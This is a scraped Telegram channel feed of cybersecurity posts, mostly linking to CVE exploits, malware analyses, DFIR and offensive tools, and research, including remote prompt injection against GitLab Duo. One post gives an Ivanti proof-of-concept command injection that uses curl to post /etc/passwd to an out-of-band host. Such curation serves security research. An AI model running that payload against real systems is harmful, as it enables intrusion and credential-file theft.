现已上线!2025 年 Telegram 研究 — 年度关键洞察 
İbrahim BALOĞLU - Siber Güvenlik Paylaşımları
前往频道在 Telegram
Mevcut grup, Siber Güvenlik alanında paylaşımlar yapmak için oluşturulmuştur.
显示更多1 071
订阅者
+124 小时
+57 天
+2430 天
帖子存档
#exploit
1⃣ CVE-2025-5333:
RCE in Broadcom Altiris IRM
2⃣ CVE-2025-32813/32814/32815:
Infoblox NetMRI UnauthCI / SQLi / Auth. Bypass
3⃣ CVE-2025-6543:
Citrix NetScaler Memory overflow
4⃣ CVE-2025-24985:
Windows Fast FAT Driver RCE
5⃣ libxml2: Integer overflow leading to heap-buffer-overflow in xmlRegEpxFromParse
6⃣ CVE-2025-29824:
Windows CLFS UaF vulnerability
7⃣ CVE-2025-4919:
Corruption via Math Space in Mozilla Firefox
8⃣ CVE-2025-49127:
Kafbat UI RCE via JMX Unsafe Deserialization
9⃣ CVE-2025-31651:
Apache Tomcat rewrite rule processing component
🔟 CVE-2025-49144:
LPE in Notepad++ v8.8.1 Installer
#Malware_analysis
1. RedDirection Malicious Campaign
2. macOS Odyssey Infostealer
3. Trojanized versions PuTTY and WinSCP
4. Zip Smuggling:
Utility for creating zip files that smuggle additional data for later extraction + YARA Rule
5. Interlock RAT/NodeSnake
6. Fake Android Money Transfer App
7. Malware in Official GravityForms Plugin
#tools
#DFIR
1. KubeForenSys - tool for collecting Kubernetes cluster data and ingesting it into Azure Log Analytics workspace for analysis post-compromise
https://github.com/invictus-ir/KubeForenSys
2. FindOldSIDTraces - cross-platform tool to find traces of old SIDs remaining in LDAP objects of the AD
https://github.com/TheManticoreProject/FindOldSIDTraces
3. Forensic journey:
Breaking down the UserAssist artifact structure
https://securelist.com/userassist-artifact-forensic-value-for-incident-response/116911
]-> UserAssist Parser
#Events
#Offensive_security
"Compromising Workspace from Windows, AD & EntraID", SO-CON 2025.
]-> Cloud Privilege Escalation Awesome Script Suite
// This talk includes demos on abusing GCPW, GCDS, GPS, and Admin Directory Sync.
See also:
SO-CON 2025 Presentation Archive
CVE-2025-47176
*
Microsoft Outlook - Remote Code Execution
*
./POC
#DFIR
#Whitepaper
#Blue_Team_Techniques
"Windows (10/Servers) Forensics Analysis", v.1.0.
]-> Windows User Activity Analysis
// This whitepaper will help DFIR investigators get better and faster evidence during Windows forensic investigations with ZERO money cost instead of using commercial DFIR tools
#tools
#Offensive_security
1. reverse_ssh - SSH based reverse shell
2. Wsuks - Automating the MITM attack on WSUS
3. Shell as root - Exploiting an SSRF vulnerability on the HTB Down machine
4. Dirty Vanity in Rust
#DFIR
1. PowerShell script to collect memory and disk forensics for DFIR investigations
https://github.com/dwmetz/CyberPipe
2. Stealth Syscall Execution:
Bypassing ETW, Sysmon, and EDR Detection
https://www.darkrelay.com/post/stealth-syscall-execution-bypass-edr-detection
3. Analysis of a suspicious binary found in MicroDicom Viewer installer
https://github.com/darnas11/MicroDicom-Incident-Report
#MLSecOps
"AIRTBench: Measuring Autonomous AI Red Teaming Capabilities in Language Models", 2025.
]-> https://github.com/dreadnode/AIRTBench-Code
#Kernel_Security
#Offensive_security
1. Exploiting UAF in vsock subsystem
of the Linux kernel (CVE-2025-21756)
https://github.com/google/security-research/blob/f7dbb569a8275d4352fb1a2fe869f1afa79d4c28/pocs/linux/kernelctf/CVE-2025-21756_lts_cos/docs/exploit.md
2. Secure Enclaves for Offensive Operations
Part 1, Part 2
#Research
#Malware_analysis
"MALGUARD: Towards Real-Time, Accurate, and Actionable Detection of Malicious Packages in PyPI Ecosystem", 2025.
]-> Repo: https://zenodo.org/records/15545824
Gelen indirim isteklerine özel bu hafta boyunca Siber Olaylara Müdahale Eğitimini %50 indirimli olarak satın alabilirsiniz. 🔥https://www.udemy.com/course/siber-olaylara-mudahale-egitimi-windows-forensics/?couponCode=AB06AD91EEA6097CF368
![Ivanti Decrypt Stored SQL POC https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAAhACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwCusiJHgxq/Ocn0qIXCklVhT5ifekljAQkenrUCffFJDZomf5Tut48DmrX7uSP5QpBFZ+7PqRS20wifBGFoQ2iWVxIzKsaqVGenoaKbPzuZRwTwfbFFAirINwGecGnRx+ZIAAPaod5L4PSpA+AfegB8qMhCt1PpQ3+rPtUv2OUnJki6/wB6ouxHrTAQyHywnYUVF60UBcYPvU5vuiiigQp6mpj1oooAhHWiiigD/9k=)
Ivanti Decrypt Stored SQL
POC
https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx#DFIR
#Whitepaper
#Threat_Research
"A Pebble In the Ocean: Maximizing Log Fidelity In Container Environments", 2025.
]-> Configurations and experiment artifacts
#Offensive_security
Cross-site scripting (XSS) Cheat Sheet,
03 Jun 2025.
#Malware_analysis
1. Malicious Chrome Extensions
https://dti.domaintools.com/dual-function-malware-chrome-extensions
2. Simple SSH Backdoor
https://isc.sans.edu/diary/Simple+SSH+Backdoor/32000
3. Malicious VS Code Extensions
https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions
#exploit
#Threat_Research
1. Multiple CVEs in Infoblox NetMRI: RCE, Auth Bypass, SQLi, and File Read Vulnerabilities
https://rhinosecuritylabs.com/research/infoblox-multiple-cves
2. Don't Call That "Protected" Method:
Dissecting an N-Day vBulletin RCE
https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
3. Remote Prompt Injection in GitLab Duo
https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo
